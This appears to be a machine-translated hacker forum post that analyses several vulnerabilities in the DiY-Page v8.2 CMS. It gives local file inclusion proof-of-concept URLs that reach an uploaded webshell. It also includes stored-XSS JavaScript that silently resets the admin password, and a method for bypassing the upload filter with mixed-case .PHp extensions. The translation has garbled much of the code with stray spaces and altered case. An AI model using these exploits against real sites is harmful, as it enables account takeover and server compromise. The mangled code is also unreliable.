DiY-Page multi-site vulnerability analysis

Author: cnryan @ http://hi.baidu.com/cnryan

On t00ls, I saw a post on the DiY-Page sqlInj vulnerability analysis from a shoes. I also read the code and found that there are still multiple vulnerabilities in the Diy-Page v8.2 program, including local file inclusion vulnerabilities, upload vulnerabilities, cross-site vulnerabilities, etc ..

A. Local File Inclusion Vulnerability
// Js. php
$ Incfile = PATH_PRE.mod/. $ _ GET [mod]./js/. $ _ GET [name].. php;
If (! Include $ incfile) dperror ($ l_error [cant_include], $ incfile, true );

This vulnerability is obvious. If GPC is off, it can be included by uploading attachments, but the program uses the addslashes function to filter when it closes GPC.
You can also use several long file names to cut off or upload a webshell to the/tmp folder.

POC

Http: // 127.0.0.1/diypage/js. php? Mod = dpuser & name =.../up/201102/20110213 _dd7ec931179c4dcb6a8ffb8b8786d20b_17872a.txt.file /////////////////
Http: // 127.0.0.1/diypage/js. php? Mod = dpuser & name =..././tmp/shell

 

 

B. Cross-Site xss vulnerabilities

There are many cross-site sites and no filtering is performed. Similar codes include:

If ($ _ POST [issubmit] = true ){
$ Fidarray = trim ($ _ POST [fidarray],);
$ Backurl = javascript: history. go (-1 );;
$ Actionurlold = $ actionurl;
$ Actionurl. = & do = list & cataid =. $ _ GET [cataid];
$ Entrytitle = $ _ POST [entrytitle];
$ Entrycontent = $ _ POST [entrycontent];
$ Entrytag = trim ($ _ POST [entrytag]);
......

 

You can write js in the title of the publication entry. This XSS cross-homepage and cross-background.
With XSS, you can do a lot of things, such as hijacking users, stealing cookies, improving permissions, and writing shell. below is the js for resetting the administrator password:

Var xmlhttp = false;
If (window. XMLHttpRequest ){
Xmlhttp = new XMLHttpRequest ();
} Else if (window. ActiveXObject ){
Xmlhttp = new ActiveXObject ("Msxml2.XMLHTTP ");
If (! Xmlhttp) {xmlhttp = new ActiveXObject ("Microsoft. XMLHTTP ");}
}
Var action = "/diypage/admin. php? Mod = modcp & formod = dpuser & item = useradm & do = edit & uid = 1 & page = 1 & perpage = 20 ";
Var data = "gid = 2 & oldgid = 2 & dpusername = admin & dpusernewpassword = cnryan & usertpl = & regip = & loginip = &

Dpuseremail=&dpusermoney=0&dpuserintro=&avatar=default.gif & nickname = & issubmit = true ";
Xmlhttp. open ("POST", action, false );
Xmlhttp. setRequestHeader (Content-Type, application/x-www-form-urlencoded );
Xmlhttp. send (data );

 

 

C. Upload Vulnerability

The get_upload_filename function used by DiY-Page to process uploaded attachments has flaws. The Code is as follows:
/Inc/func. php
Function get_upload_filename ($ realname ){
$ Exttmp = explode (".", $ realname );
$ Ext = $ exttmp [count ($ exttmp)-1];
$ Ext = str_replace (array (asp, asa,;, "", php), $ ext );// Filter executable files
$ Filepath = get_upload_path ()./;
$ Filesubdir = date (Ym )./;
Mkdir ($ filepath. $ filesubdir, 0777 );
$ Datetmp = explode ("", microtime ());
$ Filesuffix = substr (md5 ($ datetmp [1]), 0, 6 );
If (! In_array (strtolower ($ ext), array (jpg, gif, png, bmp) $ ext. =. file;// Add the. file extension to the non-image format
$ Filename = $ filesubdir. date (Ymd). _. md5 ($ realname). _. $ filesuffix... $ ext;
$ Filepath. = $ filename;
Return array (filename => $ filename, filepath => $ filepath );
}

Get_upload_filename ()‍Replace asp, asa, and php suffixes with null. str_replace can be bypassed in uppercase. In addition, if the uploaded attachment is not jpg, gif, png, or bmp, it will automatically use. file as the suffix, which can also be exploited by the apache file Name Parsing Vulnerability.

Register a member and publish an entry. Upload *. PHp.

 

 

 

 

Finally, I wish the wst mysterious project a complete success ;-)